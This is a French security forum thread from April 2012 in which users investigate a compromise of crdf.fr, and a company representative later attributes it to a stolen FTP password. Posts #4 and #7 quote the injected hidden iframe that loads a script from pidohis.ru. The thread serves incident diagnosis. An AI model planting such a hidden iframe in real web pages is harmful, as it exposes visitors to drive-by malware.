Crdf.fr Infecté ?
#1
Posté 17 avril 2012 - 21:52
Je viens de remarquer que plusieurs sous-domaines de crdf.fr (dont threatcenter.crdf.fr) sont inaccessibles.
La page d'accueil du site, elle, ne semble pas être en odeur de sainteté auprès de Chromium :
La page contient en fait un iframe appelant un script PHP hébergé chez pidohis.ru...
Ce qui a pour effet d'exécuter un applet Java...
Ça ne sent pas bon, et ça ne vient pas de mes aisselles. A priori.
Quelqu'un a des infos ?
Bonne soirée à tous !
#2
Posté 17 avril 2012 - 22:01
Ecoute je n'arrive plus a acceder au "ThreatCenter", il y'avais un message "d'accueil" spécifiant leur retour le 19/04.
J'ai papoter avec Saachaa qui est hébergé chez eux (crdf.net)
C'est la deuxième fois en peu de temps que leur serveurs sont inacessibles.
Pour moi CRDF.fr y'a pas de soucis ni d'applet java ce lançant (je viens d'essayer)!!! (Firefox)
Ce message a été modifié par vigen - 17 avril 2012 - 22:02 .
#3
Posté 17 avril 2012 - 22:12
Le ThreatCenter & le site de Saachaa sont innacessible.
VirusTotal dit rien d'anormal pourtant : https://www.virustot...sis/1334697076/ et https://www.virustot...sis/1334697236/
Ce message a été modifié par manzai - 17 avril 2012 - 22:14 .
#4
Posté 17 avril 2012 - 22:24
Plutôt bien, merci.Salut Barbier comment va???
Quoique, d'après ce que vous me dites, le soucis viendrait de chez moi. ^^ C'est dérangeant.
Avez-vous cette ligne dans le code source de la page ? :
<iframe src="http://pidohis.ru/count13.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px; " width="10" height="10"></iframe>
Ce message a été modifié par le barbier fou - 17 avril 2012 - 22:24 .
#6
Posté 17 avril 2012 - 22:31
Ce message a été modifié par le barbier fou - 17 avril 2012 - 22:31 .
#7
Posté 17 avril 2012 - 22:38
Le rapport Anubis le confirme, il y a bien une requête vers pidohis.ru (qui n'a rien à faire là). Peut-être n'aboutit-elle pas, vu que le chargement se termine par un timeout.
Oui j'ai bien aussi la requete, (Firefox, firebug comme éditeur) :
"<iframe width="10" height="10" src="http://pidohis.ru/count13.php" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>
<html xmlns="http://www.w3.org/1999/xhtml" class="blacklist">
<head>
<link rel="stylesheet" href="chrome://global/skin/netError.css" type="text/css" media="all"/>
<link rel="icon" type="image/png" id="favicon" href="chrome://global/skin/icons/blacklist_favicon.png"/>
Ce message a été modifié par vigen - 17 avril 2012 - 22:44 .
#8
Posté 17 avril 2012 - 22:41
#9
Posté 17 avril 2012 - 22:48
Oui.
Ce devait etre la réponse pour Adblock, mais j'ai édité entre temps vu que j'ai trouver la ligne dans le code de la page !!!
#10
Posté 17 avril 2012 - 22:52
Oui.
Ce devait etre la réponse pour Adblock, mais j'ai édité entre temps vu que j'ai trouver la ligne dans le code de la page !!!
Oui.
#11
Posté 17 avril 2012 - 23:05
Pour Firefox tous vas bien ^^ (pour crdf.fr)
Si l'on va sur: http://pidohis.ru/count13.php la page "malveillante", Firefox la bloque ainsi que WOT.
En fouinant un peu on trouve ça:
http://jsunpack.jeek...e52be5ff21080a0
Bref, je te confirme Barbier ce n'était pas tes aisselles !!!
Ce message a été modifié par vigen - 17 avril 2012 - 23:26 .
#12
Posté 18 avril 2012 - 00:35
CRDF sont au courant de ça ?
Le site pidohis.ru est à fuir, c'est certain. Il est néanmoins difficile de deviner ce que fait exactement le javascript - puisqu'apparemment c'en est un. Je n'ai plus d'applet Java qui se lance, la requête vers pidohis ne semble plus aboutir (timeout).
#13
Posté 18 avril 2012 - 01:04
Un ptit edit a 03h20 du mat
J'ai tenter avec opéra, java a tenter de se connecter, alerte de connection du pare-feu de DrWeb Heureusement qu'il est pas automatique celui là !!!
Ce message a été modifié par vigen - 18 avril 2012 - 02:22 .
#14
Posté 18 avril 2012 - 07:54
#15
Posté 18 avril 2012 - 09:42
Sur ce coup là, l'api de google a bien fait son boulot, car sous Firefox ou Opéra, pas d'alerte du navigateur.
Ce message a été modifié par vigen - 18 avril 2012 - 09:45 .
#16
Posté 18 avril 2012 - 10:26
L'adresse: http://pidohis.ru/count13.php génére un blocage de Spidergate depuis ce matin !!!! (Et donc quand l'on se rend chez CRDF le script est bloqué!!)
Sur ce coup là, l'api de google a bien fait son boulot, car sous Firefox ou Opéra, pas d'alerte du navigateur.
Si si
blocking.PNG 38,47 Ko 6 Nombre de téléchargements
http://pidohis.ru/count13.php
"Celui qui aime à apprendre est bien près du savoir" (Confucius)
________________________________________________
#17
Posté 18 avril 2012 - 10:28
J'en parlé "ce matin" avec Le Barbier, mais quand tu va sur la page CRDF.fr rien.....Alors qu'en éditant avec Dragonfly, l'Iframe découvert par Le Barbier est bien toujours présent.
Ce message a été modifié par vigen - 18 avril 2012 - 10:29 .
#18
Posté 18 avril 2012 - 10:32
"Celui qui aime à apprendre est bien près du savoir" (Confucius)
________________________________________________
#19
Posté 18 avril 2012 - 10:34
Ok
Désolé de m'etre mal exprimé !!!!
#20
Posté 18 avril 2012 - 16:48
Le site de crdf.fr n'as pas de soucis
Le ThreatCenter & le site de Saachaa sont innacessible.
Pour le site de Saachaa, il a changer d'addresse : http://www.security-helpzone.com/
#21
Posté 18 avril 2012 - 17:13
Le site de crdf.fr n'as pas de soucis
Le ThreatCenter & le site de Saachaa sont innacessible.
Pour le site de Saachaa, il a changer d'addresse : http://www.security-helpzone.com/
Merci pour le lien
#22
Posté 19 avril 2012 - 01:18
Deux enseignements, au moins, peuvent en être tirés :
Sur ce coup là, l'api de google a bien fait son boulot, car sous Firefox ou Opéra, pas d'alerte du navigateur.
et surtout :
Désolé de dire ça, mais ces hébergeurs de taille "modeste", ils sont sympas, ils sont attendrissants, mais faut éviter, juste éviter.
#23
Posté 19 avril 2012 - 06:09
Je suis un peu vert de devoir le dire, mon naturel me faisant plutôt pencher pour les petites structures, les petites équipes, voire les activités individuelles, mais pour un hébergement, c'est chaud.
#24
Posté 22 avril 2012 - 11:02
Tout d'abord, je tiens à vous remercier de l'intérêt que vous portez aux services de CRDF France et à ses produits. Nous avons rencontré quelques difficultées en ce moment à la suite d'une fuite d'information par un virus via une clé USB connectée sur notre réseau qui contenait un Trojan-Downloader.Win32. Seul le domaine "crdf.fr" et son serveur a été touché (hébergement mutualisé OVH) par cette attaque. L'auteur de cette attaque malveillante n'avait que pour but de générer du gain et celui-ci n'a exploité aucune faille de nos serveurs, il avait tout simplement le mot de passe d'un de nos serveurs FTP.
Le problème a été définitivement réglé. Nous déplaçons actuellement nos serveurs vers une autre infrastructure chez un hébergeur concurent. Notre priorité était donc de rétablir nos clients et non les sites Web à faible audience (c.f securityhelpzone).
> Désolé de dire ça, mais ces hébergeurs de taille "modeste", ils sont sympas, ils sont attendrissants, mais faut éviter, juste éviter.
Je tiens à dire que le serveur qui a été "piraté" (c'est un bien grand mot) est un serveur mutualisé OVH. Pour preuve, personne n'est à l'abri d'une faille de sécurité, d'un virus informatique ou d'un vol de données. C'est le risque à prendre sur internet. De plus, il n'y pas eu d'exploitation de failles sur l'une de nos applications.
Moralité : nous renforçons encore une fois la sécurité sur toutes nos infrastructures.
Cordialement,
Patrick,
Ce message a été modifié par crdffrance - 22 avril 2012 - 11:03 .
#25
Posté 22 avril 2012 - 11:25
bon, je comprends ton point de vue, et ta réaction, mais enfin: piraté, cela reste le mot, d'après ce que tu décris. Votre réseau est une infrastructure (logicielle) sous votre responsabilité, j'imagine, et non fournie par OVH, qui héberge. Dis-moi si je me trompe, mais je n'ai pas connaissance qu'OVH offre la prestation complète que tu décris. Et le service que vous rendez, c'est bien du cloud, donc un hébergement. Et c'est là qu'il y a eu faille.
A mon sens, la sécurisation des hébergements n'est jamais sûre à 100%, même chez OVH. J'en ai parfaitement conscience. Mais à ma connaissance, la plupart des piratages résultent de failles laissées non par eux, mais par les hébergés.
Je suis persuadé que sur le sujet de la sécurisation des hébergements, plus il y a de compétences, mieux c'est, et en ce sens, sur un sujet comme la sécurisation plus que dans d'autres, c'est à la faveur de ceux qui peuvent se payer et mettre en œuvre ces compétences.
Je n'ai pas dit que c'est conforme à ma "philosophie", mais je constate que seuls les gros ou presque arrivent à suivre sur ce sujet.
Bon, il y a des exceptions en tout, et mon intention n'est pas de te froisser, ni toi ni ton équipe. Je dis juste, chacun son taf. Votre action est tournée vers autre chose, de très louable au passage (je vous connais surtout par threatcenter - le cloud, je ne suis pas hyper chaud), ce n'est pas sans rapport, mais c'est autre chose, et l'essentiel, c'est que vous soyez bon dans votre domaine.
Je conclue tout de même en rappelant que ça nous est arrivé aussi, chez ovh aussi, mais il semble, après quelques investigations, que la faute était notre. Un truc pas à jour.
#26
Posté 22 avril 2012 - 12:18
Les serveurs de CRDF Cloud n'ont pas été touchés, c'est d'ailleurs pour ça que j'ai bien précisé (crdf.fr). Notre site Web portail est hébergé sur un serveur mutualisé. Je tiens à préciser que les serveurs de CRDF Cloud sont très sécurisés.
> A mon sens, la sécurisation des hébergements n'est jamais sûre à 100%, même chez OVH. J'en ai parfaitement conscience. Mais à ma connaissance, la plupart des piratages résultent de failles laissées non par eux, mais par les hébergés.
En effet. Il y a des failles partout.
> Bon, il y a des exceptions en tout, et mon intention n'est pas de te froisser, ni toi ni ton équipe. Je dis juste, chacun son taf. Votre action est tournée vers autre chose, de très louable au passage (je vous connais surtout par threatcenter - le cloud, je ne suis pas hyper chaud), ce n'est pas sans rapport, mais c'est autre chose, et l'essentiel, c'est que vous soyez bon dans votre domaine.
Je te remercie. Nous essayons d'être efficace.
Je pense que vous avons réagis très rapidement à ce problème sur notre site Internet. Tout est réglé et sécurisé.
Si vous avez d'éventuelles questions, merci de nous contacter à clients@crdf.fr.
Cordialement,
Patrick,
Ce message a été modifié par crdffrance - 22 avril 2012 - 13:34 .
#27
Posté 22 avril 2012 - 13:30
Je voudrais savoir si votre site a l'adresse http://threatcenter.crdf.fr/ a été corrigé?
Merci pour votre réponse
1 utilisateur(s) en train de lire ce sujet
0 membre(s), 1 invité(s), 0 utilisateur(s) anonyme(s)